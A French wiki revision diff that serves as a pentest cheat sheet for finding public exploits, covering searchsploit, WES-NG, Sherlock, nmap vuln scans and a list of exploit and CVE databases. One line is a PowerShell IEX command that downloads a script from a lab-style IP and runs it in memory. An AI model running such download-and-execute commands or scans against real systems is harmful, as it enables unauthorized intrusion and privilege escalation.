Outils d'utilisateurs

Outils du Site


trouver_des_exploits_publique

Différences

Cette page vous donne les différences entre la révision choisie et la version actuelle de la page.

Lien vers cette vue

trouver_des_exploits_publique [2020/07/28 13:55]
M0N5T3R
trouver_des_exploits_publique [2023/10/01 22:32] (Version actuelle)
M0N5T3R
Ligne 9: Ligne 9:
 **offline :** **offline :**
  
 +  * un outil comme searchsploit mais qui cherche sur exploit-db et https://github.com/nomi-sec/PoC-in-GitHub : https://github.com/usdAG/search_vulns 
   * SearchSploit https://www.exploit-db.com/documentation/Offsec-SearchSploit.pdf   * SearchSploit https://www.exploit-db.com/documentation/Offsec-SearchSploit.pdf
   * -> git clone https://github.com/offensive-security/exploit-database.git   * -> git clone https://github.com/offensive-security/exploit-database.git
Ligne 19: Ligne 20:
   * -> searchsploit -x 7618[.c] #Open vi to inspect the exploit   * -> searchsploit -x 7618[.c] #Open vi to inspect the exploit
   * -> searchsploit --nmap file.xml #Search vulns inside an nmap xml result   * -> searchsploit --nmap file.xml #Search vulns inside an nmap xml result
 +  * -> searchsploit openssh 3 --color| grep -i 'openssh 3.' #This example filter the result 
 +  * -> nmap --min-rate 200 -p- 10.10.10.93 -oX resultat.xml
 +  * -> searchsploit -x --nmap resultat.xml
 +
 +
  
   * MSF-Search   * MSF-Search
Ligne 29: Ligne 35:
   * Nmap vuln   * Nmap vuln
   * -> nmap -Pn -n -sV -oN vulnnmapoutput.txt --script vuln 127.0.0.1   * -> nmap -Pn -n -sV -oN vulnnmapoutput.txt --script vuln 127.0.0.1
 +
 +  * Sherlock , PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.
 +  * -> https://github.com/rasta-mouse/Sherlock
 +  * -> powershell "IEX(New-Object Net.Webclient).downloadString('http://10.10.14.13:3001/Sherlock.ps1'); Find-AllVulns"
 +  * ->  attend quelque minutes
  
  
Ligne 41: Ligne 52:
  
   * Windows Exploit Suggester - Next Generation (WES-NG)   * Windows Exploit Suggester - Next Generation (WES-NG)
-  * -> git clone https://github.com/bitsadmin/wesng+  * -> git clone https://github.com/bitsadmin/wesng.git
   * -> python wes.py --update   * -> python wes.py --update
   * -> python wes.py sysinfoTarget.txt    * -> python wes.py sysinfoTarget.txt 
Ligne 48: Ligne 59:
   * -> wes.py systeminfo.txt -e --hide "Internet Explorer" Edge Flash   * -> wes.py systeminfo.txt -e --hide "Internet Explorer" Edge Flash
   * Only show vulnerabilities of a certain impact   * Only show vulnerabilities of a certain impact
-  * -> wes.py systeminfo.txt - -impact "Remote Code Execution"+  * -> wes.py systeminfo.txt - -impact "Remote Code Execution" 
   * -> wes.py systeminfo.txt -i "Remote Code Execution"   * -> wes.py systeminfo.txt -i "Remote Code Execution"
 +  * -> wes.py systeminfo.txt -i "Elevation of Privilege"
   * Only show vulnerabilities of a certain severity   * Only show vulnerabilities of a certain severity
-  * -> wes.py systeminfo.txt --severity critical+  * -> wes.py systeminfo.txt --severity critical important
   * -> wes.py systeminfo.txt -s critical   * -> wes.py systeminfo.txt -s critical
  
Ligne 65: Ligne 77:
 **online :** **online :**
  
 +  * https://cn-sec.com/?s=CVE
 +  * https://snyk.io/vuln
   * http://www.securityfocus.com/   * http://www.securityfocus.com/
   * https://www.cvedetails.com/   * https://www.cvedetails.com/
Ligne 96: Ligne 110:
   * http://routerpwn.com/   * http://routerpwn.com/
   * https://www.rapid7.com/db/   * https://www.rapid7.com/db/
-  * http://0day.today/+  * http://0day.today/ **non recommandé** [[https://forum.zenk-security.com/showthread.php?tid=2590|thread sur le forum]]
   * https://cve.mitre.org/cve/   * https://cve.mitre.org/cve/
   * http://www.exploitalert.com   * http://www.exploitalert.com
Ligne 119: Ligne 133:
   * https://www.vulncode-db.com/ Vulncode-DB - is a database for vulnerabilities and their corresponding source code if available.   * https://www.vulncode-db.com/ Vulncode-DB - is a database for vulnerabilities and their corresponding source code if available.
   * https://cveapi.com/ cveapi - free API for CVE data.   * https://cveapi.com/ cveapi - free API for CVE data.
- 
- 
   * http://securityvulns.com/   * http://securityvulns.com/
- 
   * http://insecure.org/sploits_all.html   * http://insecure.org/sploits_all.html
- 
- 
   * http://zerodayinitiative.com/advisories/published/   * http://zerodayinitiative.com/advisories/published/
- 
   * http://nmrc.org/pub/index.html   * http://nmrc.org/pub/index.html
 +  * http://oval.mitre.org
  
-  * http://oval.mitre.org 
  
 +**Finding more information regarding the exploit **
 +  * http://www.cvedetails.com
 +  * http://packetstormsecurity.org/files/cve/[CVE]
 +  * http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]
 +  * http://www.vulnview.com/cve-details.php?cvename=[CVE]
  
trouver_des_exploits_publique.1595937334.txt.gz · Dernière modification: 2020/07/28 13:55 par M0N5T3R